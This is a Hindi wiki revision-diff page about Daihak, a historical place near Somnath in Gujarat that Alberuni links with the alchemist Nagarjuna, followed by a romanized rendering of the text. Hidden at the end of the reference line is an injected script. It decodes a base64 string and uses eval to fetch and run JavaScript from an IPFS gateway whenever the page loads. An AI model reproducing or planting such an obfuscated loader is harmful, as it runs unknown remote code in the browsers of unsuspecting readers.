Difference between revisions of "दैहक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "विद्वान " to "विद्वान् ")
 
Line 1: Line 1:
'''दैहक''' [[सौराष्ट्र]], [[गुजरात]] का एक [[ऐतिहासिक स्थान]] है। प्रसिद्ध [[मुस्लिम]] विद्वान [[अलबेरूनी]] ने भी दैहक का एक जगह उल्लेख किया है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=454|url=}}</ref>
+
'''दैहक''' [[सौराष्ट्र]], [[गुजरात]] का एक [[ऐतिहासिक स्थान]] है। प्रसिद्ध [[मुस्लिम]] विद्वान् [[अलबेरूनी]] ने भी दैहक का एक जगह उल्लेख किया है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=454|url=}}</ref>
  
*10वीं शती के [[अरब]] पर्यटक तथा विद्वान लेखक अलबेरूनी के एक उल्लेख के अनुसार रसविद्या के प्रसिद्ध भारतीय आचार्य [[नागार्जुन बौद्धाचार्य|नागार्जुन]], [[सोमनाथ]] के निकट दैहक नामक स्थान में रहते थे।
+
*10वीं शती के [[अरब]] पर्यटक तथा विद्वान् लेखक अलबेरूनी के एक उल्लेख के अनुसार रसविद्या के प्रसिद्ध भारतीय आचार्य [[नागार्जुन बौद्धाचार्य|नागार्जुन]], [[सोमनाथ]] के निकट दैहक नामक स्थान में रहते थे।
 
*अलबेरुनी का नागार्जुन विषयक यह कथन भ्रामक जान पड़ता है, किन्तु दैहक से तात्पर्य अवश्य ही देहोत्सर्ग या [[प्रभासपाटन]] ([[कृष्ण]] के देहोत्सर्ग का स्थान) से है।
 
*अलबेरुनी का नागार्जुन विषयक यह कथन भ्रामक जान पड़ता है, किन्तु दैहक से तात्पर्य अवश्य ही देहोत्सर्ग या [[प्रभासपाटन]] ([[कृष्ण]] के देहोत्सर्ग का स्थान) से है।
  

Latest revision as of 14:39, 6 July 2017

daihak saurashtr, gujarat ka ek aitihasik sthan hai. prasiddh muslim vidvanh alaberooni ne bhi daihak ka ek jagah ullekh kiya hai.[1]

  • 10vian shati ke arab paryatak tatha vidvanh lekhak alaberooni ke ek ullekh ke anusar rasavidya ke prasiddh bharatiy achary nagarjun, somanath ke nikat daihak namak sthan mean rahate the.
  • alaberuni ka nagarjun vishayak yah kathan bhramak jan p data hai, kintu daihak se tatpary avashy hi dehotsarg ya prabhasapatan (krishna ke dehotsarg ka sthan) se hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 454 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh